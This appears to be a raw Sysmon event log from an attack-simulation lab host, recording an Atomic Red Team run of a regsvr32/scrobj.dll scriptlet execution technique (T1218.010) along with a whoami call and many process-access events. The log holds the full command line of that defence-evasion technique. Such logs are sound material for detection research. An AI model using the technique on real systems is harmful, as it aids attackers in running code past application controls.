22:12:47.202{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360058Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.202{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360057Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.202{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360056Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.202{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360055Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.202{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360054Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.202{8e433fbf-36df-6013-9b03-000000001100}93929388C:\Windows\system32\cmd.exe{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\system32\regsvr32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\system32\cmd.exe+134fb|C:\Windows\system32\cmd.exe+1489f|C:\Windows\system32\cmd.exe+c0c1|C:\Windows\system32\cmd.exe+b5e1|C:\Windows\system32\cmd.exe+124e4|C:\Windows\system32\cmd.exe+180dd|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000360053Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.213{8e433fbf-36df-6013-9c03-000000001100}10076C:\Windows\System32\regsvr32.exe10.0.18362.1 (WinBuild.160101.0800)Microsoft(C) Register ServerMicrosoft® Windows® Operating SystemMicrosoft CorporationREGSVR32.EXEC:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=578BAB56836A3FE455FFC7883041825B,SHA256=8FFC7F80EFBF746E49F37EA3D140F042CF71EF20B4DA2A8F02688E79295DA11D,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll" 13241300x8000000000000000360052Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.202{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\regsvr32.exeBinary Data 10341000x8000000000000000360051Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.202{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360050Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.202{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c01f5|UNKNOWN(00007FFC8F2B5DD3) 10341000x8000000000000000360049Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.186{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360048Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.186{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360047Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.186{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360046Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.186{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360045Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.186{8e433fbf-3378-6013-6702-000000001100}29323112C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360044Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.186{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|UNKNOWN(00007FFC8EF99C27) 154100x8000000000000000360043Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.199{8e433fbf-36df-6013-9b03-000000001100}9392C:\Windows\System32\cmd.exe10.0.18362.1 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct scrobj.dll" C:\Users\ADMINI~1\AppData\Local\Temp\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=9D59442313565C2E0860B88BF32B2277,SHA256=D0CEB18272966AB62B8EDFF100E9B4A6A3CB5DC0F2A32B2B18721FEA2D9C09A5,IMPHASH=272245E2988E1E430500B852C4FB5E18{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 13241300x8000000000000000360042Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:47.186{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 11241100x8000000000000000360041Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.186{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-01-28 22:12:47.186 11241100x8000000000000000360040Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.186{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-01-28 22:12:47.186 10341000x8000000000000000360039Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.999{8e433fbf-3433-6013-2303-000000001100}92689624C:\Windows\system32\conhost.exe{8e433fbf-36df-6013-9a03-000000001100}3988C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\conhost.exe+1260d|C:\Windows\system32\conhost.exe+12505|C:\Windows\system32\conhost.exe+895c|C:\Windows\system32\conhost.exe+f2e6|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360038Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.999{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360037Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.999{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360036Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.999{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360035Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.999{8e433fbf-2a44-6013-1200-000000001100}11641580C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360034Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.999{8e433fbf-3378-6013-6702-000000001100}29326892C:\Windows\system32\csrss.exe{8e433fbf-36df-6013-9a03-000000001100}3988C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000360033Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:46.999{8e433fbf-3433-6013-2203-000000001100}66805812C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{8e433fbf-36df-6013-9a03-000000001100}3988C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5bcc6|C:\Windows\System32\KERNEL32.DLL+1be93|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\76c2318d9c3680627b8a4a680bb84f48\System.ni.dll+2c4179|UNKNOWN(00007FFC8EDAE154) 154100x8000000000000000360032Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:47.007{8e433fbf-36df-6013-9a03-000000001100}3988C:\Windows\System32\whoami.exe10.0.18362.1 (WinBuild.160101.0800)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\IP-0A000111\Administrator{8e433fbf-337a-6013-b5aa-3d0000000000}0x3daab52HighMD5=2EEEEC89E705F73FFBCAE014E1828788,SHA256=A8A4C4719113B071BB50D67F6E12C188B92C70EEAFDFCD6F5DA69B6AAA99A7FD,IMPHASH=7FF0758B766F747CE57DFAC70743FB88{8e433fbf-3433-6013-2203-000000001100}6680C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 13241300x8000000000000000360788Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-SetValue2021-01-28 22:12:48.984{8e433fbf-36df-6013-a203-000000001100}7256C:\Windows\system32\cmd.exeHKLM\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-1117338214-1411020952-3261875682-500\\Device\HarddiskVolume2\Windows\System32\cmd.exeBinary Data 10341000x8000000000000000360787Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.968{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360786Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.968{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360785Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.968{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000360784Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 